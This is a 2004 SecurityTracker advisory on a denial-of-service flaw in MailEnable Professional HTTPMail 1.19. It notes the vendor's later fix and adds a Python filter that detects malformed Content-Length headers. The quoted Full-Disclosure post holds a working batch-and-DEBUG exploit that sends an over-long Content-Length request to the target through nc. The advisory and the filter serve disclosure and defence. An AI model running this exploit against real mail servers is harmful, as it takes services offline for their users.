SecurityTracker.com
Category:   Application (E-mail Server)  >   MailEnable
Vendors:   MailEnable Pty. Ltd.
MailEnable Professional HTTPMail Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1010837
SecurityTracker URL:  http://securitytracker.com/id/1010837
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 2 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.19
Description:   A vulnerability was reported in MailEnable Professional. A remote user can cause denial of service conditions on the HTTPMail service.

CoolICE reported that a remote user can connect to the webmail service on port 8080 and send a specially crafted HTTP GET request to cause denial of service conditions on the target system.

Impact:   A remote user can cause denial of service conditions on the HTTPMail service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mailenable.com/
Cause:   Exception handling error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 9 2004 (Vendor Issues Fix) MailEnable Professional HTTPMail Bug Lets Remote Users Deny Service
The vendor has issued a fix.
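
A defensive check for the over-long Content-Length header that appears in the source message below, added here as an example (not code from SecurityTracker, the original poster, or MailEnable): it inspects the head of an HTTP request, as a filtering proxy in front of the webmail port might, and reports Content-Length values that are non-numeric, over-long, or conflicting. The function name, the 10-digit limit, the GET/HEAD body policy and the sample requests are assumptions constructed for illustration.

```python
import re

MAX_DIGITS = 10  # assumption: no legitimate webmail request needs more digits
_DECIMAL = re.compile(rb"[0-9]+")


def content_length_findings(raw_request: bytes) -> list[str]:
    """Return reasons to reject the request head; an empty list means it passed."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].upper()
    findings, seen = [], []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"content-length":
            continue
        value = value.strip()
        seen.append(value)
        if not _DECIMAL.fullmatch(value):
            findings.append("Content-Length is not a decimal integer")
        if len(value) > MAX_DIGITS:
            findings.append(f"Content-Length value is {len(value)} bytes long")
    if len(set(seen)) > 1:
        findings.append("conflicting Content-Length headers")
    # Policy assumption: this webmail front end never expects a body on GET/HEAD.
    if seen and not findings and method in (b"GET", b"HEAD") and int(seen[0]) > 0:
        findings.append("GET/HEAD declares a request body")
    return findings


# Constructed sample requests (not captured traffic).
SAMPLE_MALFORMED = b"GET / HTTP/1.0\r\nContent-Length: " + b"9" * 100 + b"XXXX\r\n\r\n"
SAMPLE_NORMAL = b"POST /login HTTP/1.0\r\nContent-Length: 27\r\n\r\n" + b"a" * 27
SAMPLE_CONFLICT = b"POST / HTTP/1.0\r\nContent-Length: 5\r\nContent-Length: 6\r\n\r\n"
SAMPLE_GET_BODY = b"GET / HTTP/1.0\r\nContent-Length: 5\r\n\r\nhello"

if __name__ == "__main__":
    for label, req in [("malformed", SAMPLE_MALFORMED), ("normal", SAMPLE_NORMAL),
                       ("conflict", SAMPLE_CONFLICT), ("get-body", SAMPLE_GET_BODY)]:
        print(label, content_length_findings(req) or "ok")
```
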



 Source Message Contents

Subject:  [Full-Disclosure] DOS@MEHTTPS


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:	MailEnable Professional HTTPMail 
:Vendors:	http://www.mailenable.com/
:Version:	1.19
:Platforms:	Windows
:Bug:		D.O.S
:Date:		2004-07-30
:Author:	CoolICE
:E_mail:	CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 



Copyright 2021, SecurityGlobal.net LLC